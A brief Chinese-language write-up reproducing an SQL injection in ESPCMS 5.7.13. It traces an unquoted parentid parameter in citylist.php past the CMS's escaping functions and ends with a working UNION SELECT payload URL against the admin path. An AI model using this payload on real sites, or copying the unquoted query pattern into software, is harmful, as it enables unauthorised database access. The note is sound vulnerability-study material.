espcms5.7.13 sql注入漏洞复现
使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/control/citylist.php文件
可以看到$sql = "select * from $db_table where parentid=$parentid";
中没有使用单引号闭合,再往上`$parentid = $this->fun->accept('parentid', 'R');
$parentid = empty($parentid) ? 1 : $parentid;`参数经过了accept函数,找到函数定义的位置
进入daddslashes函数
找注入点,全局搜索调用类的位置,查找"new important"
最终payload是"/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1 union select 1,2,database(),4,5"